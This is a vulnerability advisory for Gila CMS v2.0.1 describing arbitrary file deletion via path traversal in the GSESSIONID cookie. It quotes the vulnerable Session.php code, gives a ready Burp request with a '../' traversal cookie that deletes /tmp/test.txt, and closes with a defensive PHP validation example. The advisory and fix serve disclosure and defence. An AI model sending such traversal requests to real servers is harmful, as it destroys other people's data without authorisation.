Gila CMS v2.0.1 Unrestricted File Deletion

Gila CMS, v2.0.1 and below, is vulnerable to an arbitrary file deletion attack, in which an attacker can delete arbitrary files from the remote server by sending a maliciously crafted GET request. In this version, a previous unrestricted file upload vulnerability is patched, but the webapp is still vulnerable.

Take Gila CMS v2.0.1 as an example. The vulnerable component is in src/core/classes/Session.php:

if (isset($_COOKIE['GSESSIONID'])) {
  if (!file_exists(LOG_PATH.'/sessions/'.$_COOKIE['GSESSIONID'])) {
    User::metaDelete(self::userId(), 'GSESSIONID', $_COOKIE['GSESSIONID']);

which calls:

public static function destroy()
    if (self::userId()>0) {
      $session_log = new Logger(LOG_PATH.'/sessions.log');
      $session_log->info('End', ['user_id'=>self::userId(), 'email'=>self::key('user_email')]);
    @$_SESSION = [];

The $_COOKIE['GSESSIONID'] variable is not properly filtered, so the @unlink call deletes any file as long as the webapp user has proper write access.

A sample request through Burp to delete /tmp/test.txt file:

GET /gila/?c=random_user HTTP/1.1
Host: localhost
User-Agent: "arbitrary content"
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: GSESSIONID=../../../../../../../tmp/test.txt
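
One way to close this hole, shown as an added example that is not Gila CMS's own code or its official patch: check the GSESSIONID cookie against an allowlist and confirm the resolved path stays inside the sessions directory before any file operation. The function names, the token format (16 to 128 alphanumeric characters) and the demo paths are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: map a cookie value to a file inside $sessionsDir,
// or return null when the value could point anywhere else.
function sessionFilePath(string $sessionsDir, string $cookieValue): ?string
{
    // Allowlist (assumed token format): no '/', '\', '.', NUL or empty value.
    if (preg_match('/\A[A-Za-z0-9]{16,128}\z/', $cookieValue) !== 1) {
        return null;
    }
    $base = realpath($sessionsDir);
    if ($base === false) {
        return null;
    }
    $path = $base . DIRECTORY_SEPARATOR . $cookieValue;
    // Defence in depth: if the entry exists, its canonical location must
    // still be directly inside the sessions directory (rejects symlinks out).
    $real = realpath($path);
    if ($real !== false && dirname($real) !== $base) {
        return null;
    }
    return $path;
}

// Hypothetical replacement for an unlink() on the raw cookie value.
function destroySessionFile(string $sessionsDir, string $cookieValue): bool
{
    $path = sessionFilePath($sessionsDir, $cookieValue);
    if ($path === null || !is_file($path)) {
        return false;
    }
    return unlink($path);
}

// Constructed demo: a throwaway directory tree with one file outside sessions/.
$root = sys_get_temp_dir() . '/gila-demo-' . bin2hex(random_bytes(4));
mkdir("$root/log/sessions", 0700, true);
file_put_contents("$root/test.txt", 'must survive');
$token = bin2hex(random_bytes(16));
file_put_contents("$root/log/sessions/$token", '');

// Traversal value in the style of the request above is refused.
var_dump(destroySessionFile("$root/log/sessions", '../../test.txt'));
var_dump(file_exists("$root/test.txt"));
// A well-formed token that names a real session file is removed.
var_dump(destroySessionFile("$root/log/sessions", $token));
```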